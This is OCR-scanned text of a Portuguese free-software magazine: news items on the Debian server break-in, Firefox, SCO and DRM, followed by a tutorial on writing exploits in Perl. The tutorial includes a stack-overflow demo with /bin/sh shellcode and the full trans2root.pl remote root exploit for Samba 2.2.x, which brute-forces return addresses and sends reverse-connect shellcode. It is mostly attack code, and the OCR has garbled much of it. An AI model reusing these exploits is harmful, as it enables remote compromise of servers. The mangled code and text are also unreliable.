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máquinas do 


projeto Debian 


seus serviços foram comprometidos 


foram invadida 


Entre elas, a master (sistema de Bugs), murphy (listas), 


gluck (cvs) e kleker (segurança, www-master, busca). 


A distro tinha fama de ser extremamente estável, 


principalmente devido aos vários testes que são realizados 


antes de uma nova versão ser disponibilizada ao público 
Entretanto, o fato de alguém ter conseguido entrar nas 
máquinas do projeto, conseguir privilégio de usuário root e 


instalar arquivos para danificar o sistema fez com que 


muitos projetos que rodavam Debian em seus servid 


migrassem para outras distribuições, entre eles o Mplayer 


De acordo com os desenvolvedores do projeto, o problema 


que afetava versoes anteriores já foi conse 


mais informações, aces 


a página des 


http:/Avww.debian.org/security/ 
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prepara as máquinas 


V Fórum Internacional de Software Livre 


Acontece em Porto Alegre, entre os dias 2 e 5 de j 


CONGPESSO LIMPE 


Internacional de Software Livre. O evento é considerado um dos 


melhores do país devido ao fato de promover o encontro de 


diversos hackers e programadores, oferecer palestras, workshops e 


debates, além de contar também com sessões livres que podem ser 


ocupadas por grupos para debates. 
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O fórum terá apresentação de trabalhos em palestras div 


Software Livre 


temas propostos, que são: inclusão social/digital, po 
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software livre em governos, comunidade, cases, segurança, 


A tecnologia que liberta 


desenvolvimento, bancos de dados, redes e desktop. 


:Zhvww.softwarelivre.org 


Para mais informações, acesse: 


pássaro vira raposa 
Navegador do Mozilla 
muda de nôme 


O Firebird transforma-se em Firefox e apresenta ao 
usuário mais leveza, robustez e usabilidade. O navega- 
dor é fácil de instalar, oferece diversas opções de layout 
e suporte para o Mac OS. : 


A mudança de nome ocorreu por causa de um 
conflito com outro software livre: a base de dados 
Firebird. De acordo com a Mozilla Foundation, o 
projeto desse navegador é apresentar aos usuários 
uma nova geração de browsers com inovações que 
prometem deixar o Internet Explorer no passado, 
inclusive em plataformas Windows... 


Mais informações, 


1hnww.mozilla.org/producis/firefox/ 
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que as partes do 
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O vazamento de informações mostra 
como é tosco o sistema 


de.zip.torrent 
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SdinDo Da anoLescência 
Software Livre completa 20 anos 


Em carta aberta para a comunidade Linux, Richard Stallman softwares multimídia livres, vemos que o menino prodígio software 
comemorou sua saída do MIT, há 20 anos, para começar a livre está amadurecendo rapidamente. 
desenvolver um sistema operacional livre e aberto, o GNU. A 
história do kernel de Linus Torvalds e o desenvolvimento das 
distribuições não são novidade para ninguém. A pergunta 
que fica no ar é: e agora, José? 
Mas nem só de rosas é feita tal carta. Stallman dá suas 
alfinetadas também. Ele questiona se as pessoas usam o 
software livre por seu aspecto filosófico ou por mero 
modismo. Ataca os desenvolvedores de banco de dados, 
linguagens de programação e outros softwares proprietários 
que usam o ambiente GNU/Linux para trabalhar. 
DEVER 
Stallman prossegue afirmando que “para libertar os cidadãos 
do ciberespaço, temos que substituir os programas não-livres, 
e não aceitá-los”. Dessa forma, ele ressalta que alguns 
aplicativos ainda precisam ser desenvolvidos. 


Entretanto, Stallman não fala em sua carta sobre o rápido 
desenvolvimento do software livre no mundo. Ou seja, se 
levarmos em conta que há alguns anos nem existia ambiente 
gráfico para Linux e que hoje já estão sendo desenvolvidos 


ADeus mp3! 
RIAA ganha forte aliado no combate à pirataria 


Inicia-se mais um capítulo da guerra iniciada pela RIAA Vale lembrar 
(Recording Industry Association of America) contra a que, somente 
cópia e download de músicas. no ano passado, 

a RIAA proces- 
A Thomson Multimedia, detentora da patente MP3, sou 1445 
juntamente com o Instituto Fraunhoffer, anunciou que o pessoas que 
formato passará a utilizar a tecnologia DRM (Digital baixaram 
Rights Management). A tecnologia pode restringir o arquivos de 
número de cópias de cada arquivo, ou até mesmo música pela 
impedir cópias. Outros formatos como o WMA, da Internet. 
Microsoft, e o AAC, da Apple, já utilizam o DRM. 


Ao inserir essa tecnologia num dos formatos mais 
populares de áudio, o MP3, pretende-se diminuir a troca 
ilegal de arquivos de música. 
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Empregada-robô lava, passa, cozinha e 
xinga sensualmente 


Valerie pode f 


er “a maior parte dos serviços domésticos 


acordo com o que a própria andróide fala para você a 


Mudar a cor dos olhos, cabe 


desenho The Jetsons) 


entanto, uma moça pra 


utilizado em filmes trash de 


possui outros robôs curiosos à 


No momento, a superandróide só es: 


britânico ou americano. 


http:/Avww.androidworld.com/prod19.htm 


SCO CONGPa-adbaca 


Tática da empresa afirma que spam é 
ropriedade intelectual 


Não satisfeita com 

os ataques do 

vírus MyDoom, a 

SCO continua 

acusando a 
comunidade Linux de plágio na utilização de parte de código- 
fonte *nix para a criação de um sistema operacional livre e 
aberto. Desta vez, a corporação processa a AutoZone e a 
DaimlerChrysler, prosseguindo com sua estratégia de atacar 
primeiro empresas que utilizam Linux, antes de partir contra os 
usuários caseiros. 


Em 2003, a SCO enviou cerca de 1500 e-mails para empresás 
que utilizam Linux, exigindo o pagamento de US$ 700 para 
evitar procedimentos judiciais maiores. O presidente da SCO, 
Darl McBride, afirmou que a empresa “vai proteger e reforçar 
vigorosamente a propriedade intelectual”. 


A defesa a tais ataques, além de vir de milhares de 
desenvolvedores Linux e de usuários de algumas das muitas 
distribuições do sistema operacional, chega também por parte 
da IBM e da Intel que têm contribuído financeiramente nos 
últimos meses com as empresas que estão sendo processadas. 


te dar mais tempo livre”, de 


essa nova versão da Rose (a empregada-robô do 
| Valerie não é, no 
etálico. Mais parece uma espécie de robô limitado do tipo 
liywood. O AndroidWorld.com, que comercializa a moça, 
nda, como um bebê que pode ser desligado ao chorar. 
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WiGiLâNCia Na WEB 


Novo programa monitora arquivos 
baixados 


A partir de agora, tome ainda mais cuidado com o tipo de 
material que você baixa da Internet. Como se não bastas- 
sem os processos abertos pela RIAA (Recording Industry 
Association of America), os censores agora têm acesso à 
ferramenta CopySense, que monitora as redes de transfe- 
rência de arquivos P2P e que pode também bloquear os 
downloads de arquivos protegidos por copyright. 


O programa criado pela empresa Audible Magic, localizada 
nos Estados Unidos, pode ser implementado tanto nos 
programas de troca de arquivos, como o KaZaA ou o 


Soulseek, quanto nos roteadores de rede ounos modems: 


mo dos antivírus, ou seja, faz uma 


cos rígidos à procura de arquivos ilegais de 


ramas, músicas e filmes 


ntra o compartilhamento 


ge arquivos. 
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EXPLOITS EM PERL 


Uma Introdução 
à Criação d 
Exploiis em Perl 


Por Antonio Marcelo 


Perl(Practical Extraction and como Perl. Há cerca de um ano, no era sinônimo do CGl, ou'seja, para 


Report Language) foi desenvolvi- entanto, fui apresentado à linguagem de desenvolvimento Web, especialmente 


do por Larry Wall nos tempos em maneira informa! numa viagem de ônibus formulários, mecanismos de procura, etc. 


Como eu estava errado! 


que trabalhou para a NSA (National para São Paulo por dois amigos: Ramoni 


Security Agency), por volta de 1987. Larry (Projeto Pigmeat) e Felipe Cerqueira O Perl é muito, muito mais 


queria criar uma linguagem simples que (Buffer Overflow). No início, fiquei meio poderoso e fácil de aprender. Tanto é 


fosse facilmente assimilada, e que permitis- 
se gerar relatórios e extrair informações de 
texto, Mal sabia ele que estava criando 


descrente, mas resolvi investir e, um mês 
depois, nascia o projeto Honeypot com o 
primeiro sensor, o Fake Squid. Hoje, temos 


que, em duas semanas, eu já estava com o 
primeiro protótipo rodando e na produção 
de meu software. Está certo que meu 


conhecimento de C ANSl ajudou, mas o 
Perl rapidamente foi assimilado por outros 


o Honeyperl, um software de Honeypot 


uma das linguagens de programação mais 


poderosas com funções de IDS e Tarpit totalmente 


e simples de programar. 


Muitos programadores, inclusive escrito em Perl. membros de nosso projeto e se tornou a 


A minha visão era de que o Perl linguagem padrão de desenvolvimento. 
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grande preconceito 


Características do Perl 


> 


O Perl é uma linguagem interpretada, que necessita ser instalada 


http://www .cpan.org 


no micro (no Linux atualmente temos a versão 5.8). O arquivo é um 


software ljv enciado inicialmente na chamada GNU Artistic 


Lic 


desejam dese 


são 4.0), e pode ser utilizado livremente por todos que 


Para os usuários que preferem utilizar software proprietário como 


tas para ele. 


Hoje, o Perl conta com um dos recursos mais importantes sistema operacional, existe uma versão do Perl conhecida como 


Activi , que pode ser baixada no próprio site da Perl Foundation 


que existem: os Módulos de Perl. Esses módulos são novas funções 


incorporadas por programadores no mundo inteiro. Eles executam 


ce sockets até inteligência artificial. Essas à 
bibliotecas possuem a extensão .pme podem ser baixadas no site huww.perl.o 
da CPANÍCom ensive Perl Archive Network) 
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overflow remoto, que dava 


CPU executa alguma instru- 
memória. À instrução é 


>> O programa vulnerável 


Vamos fazer um programa 


imo 1 


ve! com no maxi 
mostra que podemos explorar um possível buffer overflow. Esse 


ginalmente na teleh0r, mas vamos detalha-lo 


finclude <stdio.h> 


int main() f 

char variavel [1024] ; 

1£ (getenv(“VULNERAVEL”) 
£printf (stderr, “okln”); 
exit(1); 


digo? 


e ex 


(o) 


gramadores multo exper 


jam fazer dessa mar 


'a mais comum, tanto que 10 em cada 


Ja disso, recomend 


com 


entendermos um pouco mais como ge 


Em 2000, a 


ublicou um artigo mostrando passo a 


ente e 


omo criar um exploit em Perl. A idéia b 


[= 
a 


ouro de pilha, típica de um puffer overflow, 


vulnerável; 


exploit para que possamos entender a 


mística por trá 


strcpy (variavel, (char 
*)getenv (“VULNERAVEL”) ) ; 
printf(“Variavel de ambiete 
e:inWr$s” .Anln”, variavel); 
printf (“oxin”); 

return 0; 


VULNERAVEL 


rooteoldmbox:-f acc -o vulne vulne.c 

vuln.c: In function 'main': 

wuln.c:5: warning: comparison between pointer 
and integer 
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root0oldmbox:-f export 
VULNERAVEL="perl -e “(print 
“A x" 2048)" 


rootodcx-£i. 

GNU gdb 5.3 

Copyright 2002 Free Software 
Foundation, Inc. 

GDB is free software, covered by 
the GNU General Public License, 
and you are 

welcome to change it and/or 
distribute copies of it under 
certain conditions. 

Type “show copying” to see the 
conditions. 

There is absolutely no warranty 
for GDB. Type “show warranty” 
for details. 

This GDB was configured as “i386- 
slackware-linux”... 

(gdb) 

Starting program: /root/vuln 
Variavel de ambiente VULNERAVEL 
e: 


Exemplo de vulnerabilidade 


Program received signal 
SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 

(gdb) 


Vejamos ag 


um estouro de 


estouramos 
sobrescrevemos o endereço de retorno 


Vale lembrar que certos patches de 


eguranç 


(gdb) info reg esp 
esp 0xbff£r250 
0xb££ff£250 


&1!/usr/bin/perl 


Começamos a definir o 
shellcode abaixo 


$shellcode = 
“ixebix1£ix5elx891)x761x0 
8)x31)xc0lx88)x46)x07)x89”. 
nix46)x0cixb0)x0blx89)x£3N 
x8dix4e)x08Âx8dix56)x0c”. 
“ixcdlx80)x31ixdbix89)xd8 
Ax40)xcdix80ixesixdelx£f£”. 
“Ax£fix££f/bin/sh”; 


$len = 2048 + 8; É O nosso 
bufer 

Sret = 0xbfff£f250; É O 
endereço de crash do stack 
pointer 

$nop = “lx90”; & x86 NOP - 
nosso payload 

Soffset = -1000; É Default 
offset para tentativa 


i£ (eaRGV 1 L 

Soffset = SARGVI[0]; 

3 

for (Si = 0; $i < ($len - 
length ($shellcode) - 100); 
site) 1 

Sbuffer .= $nop; 


b 


% [aqui o Buffer já está 
como : NNNNNNNNNNNNNN] 

* Vamos colocar cerca de 885 
NOP”s) 

Sbuffer .= $shellcode; 


fVamos agora reservar espaço 
para o nosso shellcode 


print (“Address: 0x”, 


sprintf('%1x', ($ret + Soffset)), 
“nr); 


FAqui, adicionamos o nosso offset 
para a stack pointer 


$new ret = pack('1', (Sret + 
Soffset)); 

for ($i += length($shellcode) ; 
< $len; $i += 4) ( 

Sbuffer .= $new ret; 


local ($ENV( "VULNERAVEL')) 
Sbuffer; exec (“/bin/vulne”) ; 


“linx86” => [0xbf£fff3ff, 
Oxbff£fr£z, 0xbf000000, 512, 
NeCreateBuffer 1inx86], 

“solx86” => [0x08047404, 
0x08047ffc, 0x08010101, 512, 
NeCreateBuffer solx86], 

“fbsdx86” => [0xbfbfefff, 
Oxbfbff£ff, 0xb£000000, 512, 
NeCreateBuffer bsdx86], 
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Socket; 
IO::Socket; 
IO::Select; 


&!/usr/bin/perl -w 
use IO ocket ; 
use Net::hostent; 


SPORT = 20000; 
conexão à escolha do programador. 


S$server Socket:: INET->new( Proto 
“tcp”, 
LocalPort => 
SPORT, 
Listen 
SOMAXCONN, 
Reuse 
1); 


die “não posso iniciar o servidor” unless 
$server; 
print “[Servidor $0 aceitando conexões] ln”; 


while ($client = $server->accept()) ( 

$client->autoflush(1) ; 

print $client “Bem-vindo ao $0; digite help 
para lista de comandos.n”; 

Shostinfo = gethostbyaddr (Sclient- 
>peeraddr) ; 

printf “[Conectado de %s]in”, Shostinfo- 
>name || Sclient->peerhost; 

print Sclient “Comando? “; 

while ( <$client>) ( 

next unless /1s/; E 
(/quit|exit/i) [ last; 


3 

elsif (/date|time/1) £ printf $client 
“$sin”, scalar localtime; ) 

elsif (/who/i ) ft print $client 
“who 2>&1"; 

elsif (/cookie/i ) ( print $client 
“/usr/games/fortune 2>& > 

elsif (/motd/i ) ( print Sclient 
“cat /etc/motd 2>&1"; 

else ( 

print S$client “Comandos: quit date who 


& porta para a 


cookie motdin” ; 


) continue ( 
print Sclient “Comando? *“; 


close Sclient; 


> 


Designing Shellcode Desmistified - Murat 


http:/Aww. enderunix.o! 


PC Assembly Book: Prof. Paul A Carter 
http:/Avwww. drpaulcarter.com/pcasm 


Unix Assembly Codes Development For 
Vulnerabilities Illustration Purpouses e 
exemplos de shellcode 
http://Isd-pl.net/documents/asmcodes-1.0.2.pdf 


A Short Introduction to Operating 
Systems: Mark Burges 
htip:sinww.iu.hio.no/-markfos/os.html(tecomen- 
dado) 


Buffer Overflow 
http://community.corest. com/-juliano/ 


>> Exploit em Perl do Samba 


%!/usr/bin/perl 
EEE 


"4H[ Header 

* Name::- 
trans2root.pl 

F Purpose: Proof of 
concept exploit for Samba 
2.2.x (trans2open overflow) 
El Authoz: H D Moore 
<hdmooreedigitaldefense.net> 
* Copyright: Copyright 
(C) 2003 Digital Defense 
Inc. 

* trans2root.pl <options> - 
t <target type> -H <your ip> 
-h <target ip> 


strict; 
Socket; 
IO: :Socket; 
IO::Select; 
POSIX; 
Getopt::Std; 


SSIG(USR2) = NeGoAway; 


my targs; 
my “targets = 
( 

“l1inx86” => 
[0OxDf£L£f3ff, OxDELLLLLL, 
0xbf000000, 512, 
NeCreateBuffer 1inx86], 

“solx86” => 
[0x08047404, 0x08047£ffc, 
0x08010101, 512, 
NeCreateBuffer solx86], 

“fbsdx86” => 
[0xbf£bfeff£, OxbEbE£££E, 
0xbf000000, 512, 
NeCreateBuffer bsdx86], 

& name & default 
% start é end + 
step F function 
5 


getopt("t:M:h:p:r:EH:P:', 
Ngargs) ; 


my Starget type = $args(t) 
|| usage O; 

my Starget host = Sargs(h) 
|| Usage O; 

my $local host Sargs(H) 
|| Usage O; 

my $local port Sargs(P) 
[| 1981; 

my S$target port = $args(p) 
|| 139; 


my Starget mode “brute” ; 


E (1 

exists ($targets(Starget type))) 
ft usage (); ) 

print “[*] Using target 
type: Starget typeln”; 


% allow single mode via the 


-M option 
i£ (Sargs(M) &s uc(Sargs(M)) 
eq “s”) 


t 
: 


* the parent process listens 
for an incoming connection 
% the child process handles 
the actual exploitation 

my Slisten pid = $$; 

my Sexploit pid = 
StartListener($local port); 


$target mode = “single”; 


% get the default return 
address for single mode 

my $targ ret = Sargs(r) || 
Stargets(Starget type)->[0]; 
my Scurr ret; 

$Starg ret = eval($targ ret); 


if (Starget mode !-- / 
brute|single/) 


print “[*] Invalid 
attack mode: Starget mode 
(single or brute only) ln”; 
exit (0); 
: 


if (Starget mode eq 
“single”) 
t 
$curr ret = Starg ret; 
if(! Starg ret) 


t 
print “[*] Invalid 
return address 
specified! In”; 
kill (VUSR2”, 
$listen pid); 
exit (0); 
3 


print “[*] Starting 
single shot mode...in”; 

printf (“[*] Using 
return address of 0x%.8xln”, 
$targ ret); 

my Sbuf = 
Stargets(Starget type)->14]- 
>($local host, $local port, 
$targ ret); 

my $ret = 
AttemptExploit (S$target host, 
$target port, Sbuf); 


sleep(2); 
kill (“USR2”, 
$listen pid); 
exit (0); 
3 


if ($target mode eq “brute”) 
f 

print “[*] Starting 
brute force mode... in”; 


Foral 

S$curr ret 
=$targets(Starget type)- 
>[2]; 

$curr ret >= 
S$targets(Starget type)->[2]; 

$curr ret - 
=$targets(Starget type)->[3] 


) 
f 


Sl++; 


select (STDOUT) ; 


my Sbuf = 
Stargets(Starget type)->[4]- 
>($local host, $local port, 
Scurr ret); 

printf (“ 
Ar[*] Return Address: 
0x%.8x”, $curr ret); 

my $ret = 
AttemptExploit (S$target host, 
Starget port, Sbuf); 


sleep(2); 
kill (“USsR2”, 
$listen pid); 
exit (0); 
) 


sub Usage ( 


print SIDERR “in”; 

print STDERR “ 
trans2root.pl - Samba 2.2.x 
*trans2open()' Remote 
Exploitin”; 

print STDERR 
>>>"; 

print STDERR “ Usage: 
Ape ir 

print STDERR “ 
$0 <options> -t <target 
type> -H <your ip> -h 
<target ip>ln”; 

print STDERR “ Options: 
Apetis 

print SIDERR * 
-M (S|B) <single or brute 
mode>n” ; 

print STDERR “ 
Ss <return address for 
single mode>in” ; 

print STDERR “ 
-p <alternate Samba 
port>ln”; 

print STDERR “ 
=P) <alternate listener 
port>ln”; 

print STDERR “ 
Targets:in”; 

foreach my $Stype 
(keys (Stargets)) 


print STDERR “ 
Stypeln”; 


print STDERR “ln”; 


exit(1); 


EXPLOITS EM PERL 


sub StartListener ( 
my ($local port) 
$listen pid = 


IO::Socket::INET->new ( 
Proto => “tcp”, 
LocaiPort => $local port, 
Type => SOCK STREAM, 
Listen => 3, 
ReuseAddr => 1 


(1 $s) 


print “[*] Could not start listener: 


exit (0); 


print “[*] Listener started on port 
$local portin”; 


my $exploit pid = fork(); 
if ($exploit pid) 
f 

my $Svictim; 

SSIG(USR2) = leGoAway; 


while ($victim = $s->accept ()) 


kill (“USR2”, Sexploit pid); 
print STDOUT “in[*] Starting Shell 
$victim->peerhost . “:;” . $victim->peerport 
“no” ; 


b 


exit (0); 


StartShell ($victim) ; 


b 


return ($exploit pid) ; 


StartShell ( 
my (Sclient) = € ; 
my $sel = IO::Select->new(); 


Unblock (*STDIN) ; 
Unblock (*STDOUT) ; 
Unblock ($client) ; 


select ($client); $|++; 
select (STDIN);  Sl++; 
select (STDOUT); S|++; 


$sel->add (Sclient) ; 
$sel->add (*STDIN) ; 


print $client “echo 1N-1N-1N=1NI[ Welcome to 
“hostname” AN (Cid NV) a”; 
print $client “echo in”; 


while (fileno($client)) 


f 
my S£d; 
my Gfds = $sel->can read(0.2); 


foreach $fã (efds 
G! 


my ein = <$fd>; 


i£(! scalar(ein)) ( next; ) 


if (1 $fã || |! Sclient) 


print “[*] Closing 
connection. in”; 

close ($client); 

exit (0); 


> 
i£ ($fd eq Sclient) 
print STDOUT join(“”, ein); 


) else ( 
print $client join(“”, ein); 
; 


> 
) 
close ($client); 


> 


sub AttemptExploit ( 
my ($Host, $Port, $Exploit) = € ; 
my Sres; 
my $s = IO::Socket::INET->new(Peeraddr => 
$Host, PeerPort => SPort, Type 
=> SOCK STREAM, Protocol => “tcp”); 


if (1 $s) 
f 


Sin”; 


print “In[*] Error: could not connect: 


kill (“USR2”, Slisten pid); 
exit (0); 


> 


select($s); S|++; 
select (STDOUT); $|++; 
Unblock ($s) ; 


my $SetupSession = 

V1x00)x00)x00)x2e)x££)x531 

x4d)x42)x731)x00)x00)x001)x00)x08”. 
“1x001x001x00)2001x001x001)x00)x001 

x00)x00)x00)x00)x00)x00)x00)x00” . 
“1x001)x001)x00)x00)x00)x00)x00)x££ 

x001)x001)x00)x00)x201)x021x00)x01”. 
V4x00)x001x001)x00" ; 


my $TreeConnect = 

v1x00)x00)x00)x3clx££lx53)x4d 

Nx421x70)x00)x001)x001x001x00” . 
“4x001)x001x00)x001)x00)x001)x00)x001 

x001x00)x00)x00)x00)x00)x64)x00” . 
“1x001)x00)x641x001)x00)x00)x001)x001 

x00)x00)x5cix5clx69)x70)x63)x24”. 
“ix25)x6e)x6£)x621)x6f1x64)x791)x001 

x00)x001x001)x00)x00)x00)x491)x507. 
six43)x24” ; 


my $Flush = (“lx00” x 808); 


print $s $SetupSession; 
$res = ReadResponse($s) ; 


print $s $TreeConnect; 
$res = ReadResponse ($s) ; 


% uncomment this for diagnostics 
fprint “[*] Press Enter to Continue...in”; 
f$res = <STDIN>; 


&print “[*] Sending Exploit Buffer...in”; 


print $s SExploit; 
print $s SFlush; 


ReadResponse ($s) ; 
close($s) ; 


CreateBuffér linx86 ( 
my ($Host, $Port, $Return) 


my $RetAddr = eval ($Return) ; 
S$RetAddr = pack (“l”, SRetAddr) ; 


my (Sal, Sa2, Sa3, $a4) = split(//, 
gethostbyname ($Host)) ; 

$al = chr(ord($al) * 0x93); 

$a2 = chr(ord($a2) * 0x93); 

$a3 chr(ord($a3) * 0x93); 

$a4 = chr(ord($a4) * 0x93); 


my ($pl, $p2) = split(//, reverse(pack(“s”, 
$Port))); DER 

$pl = chr(ord($p1l) * 0x93); 

$p2 = chr(ord($p2) * 0x93); 


my $exploit = 
* trigger the trans2open overflow 
“1x001)x04)x08)x20)x££)x53)x4dx42 
1x321x001x001)x001)x00)x001)x00)x00” . 
12x00)x001x001)x001)x00)x00)x001x00 
1x001x00)x001)x001)x011)x001x00)x00” . 
“12641 x001)x00)x001)x00)xdOlx07)x0c 
1x00)xd0)x07)x00)x00)x001)x00)x00” . 
“1x001)x00)x00)x00)x00)x00)x00ixdo 
Nx07)x43)x00)x0c)x00)x14)x08)x01”. 
“12x00)x00)x001)x001)x00)x00)x00,x00 
1x00)x001)x001x00)x00)x001)x00)x00”. 
“12x700)x001x00)x00)x00)x001)x00)x00 
N2x001)x00)x00)x001)x00)x00)x00)x907. 


GetNops (772) 


* xor decoder courtesy of hsj 
“ixeb)x02)xeblx05)xe8)x£9)x£f£)x££ 
Axfflx58)x83)xc0lx1blx8d|xa0lx01”. 
Dixfcixffixffx83)xes)xfcixsbixec 
Nx33, xc9x66)xb9)x99)x01)x80)x30”. 
“x93)x40ixezZix£a”. 


Y reverse-connect, mangled lamagra code 
+ fixes 

“ixlalx76)xazx41)x21ixf5ixlalx43 
Axa2Zix5a)x1alx58)xd0)xlalxcelx6b”. 

vixdo)xialxcelx67xd8xlalxdelx6£ 
Axlelxdel)x67|x5elx13)xazix5alxla”. 


“ixd6 67 ixdo)xf5xlalxcelx7 E xf5 54 ,xd6 | x7d”. 


$p1.5p2 ."x54)xd6)x63". 
$al.$a2.$a3.Sa4. 
“ixielxd6|x7£ixialxd6)x6blx55ixd6 
x6f)x83)x1ajx43)xd0ixlelxdelx67”. 
“ix5elx13)xa2ix5alx03)x18)xcelx67ixaz 
Ax53)xbelx52)x6cix6cix6cix5e”. 
“ix13)xd2)xaz)x41)x12)x79ix6elx6cix6c 
Ax6cixaa)x42)xe6)x79)x78)x8b”. 
“ixcdixia)xes)x9bixaZ)x53)x1blxd5 
x94)xla)xd6)x9£)x23)x98)x1alx60”. 
“Axlejxdelx9bix1e)xc6)x9£)x5e)x131 
x7blx70)x6cix6cix6cixbcixfllxfa”. 
Nixfdixbelxe0lx£b”. 


GetNops (87). 
(SRetaddr x 8). 
"PDDE VA (Nx007 x 277):; 


return Sexploit; 


CreateBuffer solx86 ( 
my ($Host, SPort, $Return) = O ; 


my SRetAddr eval ($Return) ; 
my $Ickaddr SRetAddr - 512; 


$Retaddr = pack (“l”, SRetaddr) ; 
SIckAddr = pack(“l”, SIckaddr) ; 


% IckAddr needs to point to a writable 
piece of memory 


my (Sal, $a2, $a3, $a4) = split(//, 
gethostbyname ($SHost)) ; 

$al = chr(ord(Sal) 0x93); 

$a2 chr(ord($a2) * 0x93); 

$a3 = chr(ord($a3) * 0x93); 

$a4 = chr(ord($a4) * 0x93); 


my ($pl, $p2) = split(//, reverse (pack(“s”, 
$Port))); 

$pi = chr(ord($p1) 

$p2 = chr(ord($p2) 


0x93) ; 
* 0x93); 
my Sexploit = 
* trigger the trans2open overflow 
“hx00)x04)x08)x20)x££x53)x4d)x421 
x32)x001)x001)x00)x00)x00)x00)x007. 
“ix00)x00)x00)x00)x0012x00)x00)2x001 
x00)x001)x001)x00)x01)x00)x001)x007. 
“1x641)x00)x001)x001)x00)xdO)x07)x0cl 
x00)xd0)x07)x0cix001)x00)x001x00”. 
21x00)x00)x001x00)x001)x001x00ixdo 
x07)x43)x00)x0c)x00)x14)x08)x01”. 
*1x00)x001)x00)x001)x00)x00)x00)x00N 
%001)x00)x004x00)x00)x001x00)x007. 
*1x00)x001)x00)x001)x00)x00)x001x00 
N2x00)x00)x001)x00)x00)x00)x00)x90” . 


GetNops (813) . 


* xor decoder courtesy of hsj 
“ixeb)x02)xeb)x05)xegx£9x£E)x££ 
x£f)x58)x83)xc0)x1blx8d)xa0lx01”. 
Sixfcixffixffix83)xe4s|xfclx8blxec 
1x33)xc9)x66)xb9)x99)x011)x80)x30”. 
vix93)x40|xeZlxfa”. 


% reverse-connect, code by bighawk 
“ix2bix6cix6bix6cixaf)x64)x43)xc3 
Axa2ix53)x23)x09)xc3)xlalx76xa2z”. 
“ix5alxc2ixd2xd2)xc2)xc2)x231x75 
Ax6chx46)xa2Zix41) xlalx54)x£b”. 
$al.S$a2.$a3.$a4 ."IxE5ixfb”. Spl.$Sp2. 
“ixgsixc2)x1a)x75)x£9)x83)xc5)xc4 
x23)x78)x6cix46)xa2)x41)x21)x9a”. 
vixc2)xcilxc4)x23ixadix6cix46|xdal 
xealx61)xc3ixfblxbe)xbclÂxe0lx£b”. 
“ixfblxbeixflixfalxfdixlalx70)xc3) 
xc0ixlalx71)xe3)xcilxc0lx23)xas”. 
six6cix46”. 


LOITS EM PERL 


GetNops (87) 


“010101”. 
SRetaddr .- 
$Ickaddr. 
SRetaddr. 
$Ickaddr. 
“101010”. 

“DDI!”. (“ix00” x 

277); 


return Sexploit; 


) “ 


sub CreateBuffer bsdx86 ( 
my ($Host, SPort, 
$Return) = € ; 


my SRetaddr 
eval ($Return) ; 

my $Ickaddr = $Retaddr - 
512; 


SRetaddr = pack(“1”, 
$Retaddr) ; 

SIckadar = pack(“1”, 
$Ickaddr) ; 


% IckAddr needs to point 
to a writable piece of 
memory. 


my ($al, Sa2, $a3, 
= split(//, 
gethostbyname ($Host)) ; 

$al = chr(ord($al) 
0x93); 

FEV) chr (ord($a2) 
0x93) ; 

$a3 chr (ord($a3) 
0x93); 

Sa4 chr(ord($a4) 
0x93) ; 


my ($pl, Sp2) = eplit(// 
+ reverse (pack (“s”, 
$Port))); 

$pi = chr(ord($p1) * 
0x93) ; 

$p2 = chr(ord($p2) 
0x93) ; 


my Sexploit = 
%* trigger the 

trans2open overflow 
"x00 0408 ac20 ac E 53 urád 
At 632 DO DO DO DO DO DO O 
“Nag e 0 Nac DO Nac ac e O NON, 
0000 00000 DO x 1x0 x 00 O 
“Nx px 0 NO 000 DO ÃO ac 7 O 
Cix00 dO x07 x O cx 00 x 00x 00 x007 . 
NNpgDO NeDO NO NO Nac acDO NO O 
Nx07Nx43 00 x Cx 0 1 4x0 01”. 
Ns DO NasDO a arDO DO DO O DO 
00)x00)x001x001x00)x0014x00)x007 . 
“Ne DO e DO DO Ne DO DO NO DO DO pe 
001x00)x00)x00)x00)x00)x00)x907 . 


GetNops (830) . 


* xor decoder 
courtesy of bsj 
“ixebix02ixebx05 xeBxf9 
EEyxEE xt x58)x83 co xIbix8d 
xaolx01”. 
Vixfcixffixfryx83|xes xico 


> Axgbixec)x33)xc9x661xb9)x991 


x01)x80)x30”. 
“ix93)x40)xe2zixfa”. 


* reverse-connect, 
code by bighawk 

“ixaZ 5a x64)x72)xc2 dz), 
xc2ixd2)xc2)xc2)x23)x£2)x5e)x13 
Axlalx50”. 

PixEDZS 
$al.$a2.Sa3.$a4 ."xf5ixfb”. 
Spl.$p2. 

vix£5ixc2ixlax75x21x83 
Nuclxe5)xc3 xc3 ix23 )xfI se x13 
Axd2)x237. 

Sixe9 ida xc2xcO)xcOlx5el, 
x13,xd2x71)x66)xc2x£blxbel 
xbclixe0lx£b”. 

Dye ipi ar pra pedra çe70 er 
Axc7ixc0ixc0)x23)xaSx5elx137. 


GetNops (87) . 


“0101017. 
SRetaddr. 
$Ickaddr. 
$Retaddr. 
SIckaddr. 
“101010”. 


“DDI!”. (“Ax00” x 
277); 


return Sexploit; 


> 


sub Unblock ( 

my $fd = shift; 

my Sflags; 

Sflags = 
fcntl($fd,F GETFL,0) || die 
“Can't get flags for file 
handle: Silo”; 

fcntl($£d, F SETFL, 
$flags|O0 NONBLOCK) || die 
“Can't make handle 
nonblocking: $!ln”; 


> 


sub GoAway ( 
exit (0); 
> 


sub ReadResponse ( 

my ($s) = € ; 

my $sel = IO::Select- 
>new($s) ; 

my Sres; 

my Ofds = $sel- 
>can read(4); 

foreach (efds) ( S$res .= 
<$s>; ) 


return Sres; 


sub HexDump ( 
my ($data) = O ; 
my €x = split(//, 
Sdata); 
my $ent = 0; 


foreach my $h (ex) 


f 


if ($cnt > 16) 


print “ln”; 
Sent = 0; 


printf (“x%.2x”, 
ord($h)); 
Sent++; 
É 


print “An”; 


> 


& thank you k2 ;) 
sub GetNops ( 
my (Sent) = € ; 
my Gnops = split(// 
1 EN ET 5 03 e TO dar 
48h x47)x4 E 40 41 373 ER 
SN yedio arde EB e aefic, 
x981)x27)x2 E )x9£)x£9)x4a 4412042) 
x43)x49)x4D” 
VixE5x45x4c”) ; 
return join (*”, Gnops[ 
map ( rand Gnops ) (1... 
sent )1); 


> 
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QTDesigner faz muita diferença. Além da facilidade de montar os elementos nas posições corretas, evita-se a necessidade de 
conhecer, pelomenos inicialmente, toda.a biblioteca: 

O QTDesigner gera um projeto e o código necessário para executé-lo, cabendo ao programador apenas completar o 
código para funções específicas. 

Ao longo do artigo, vamos montar um visualizador simples de imagens, utilizando o QTDesigner, e conhecer mais um pouco 
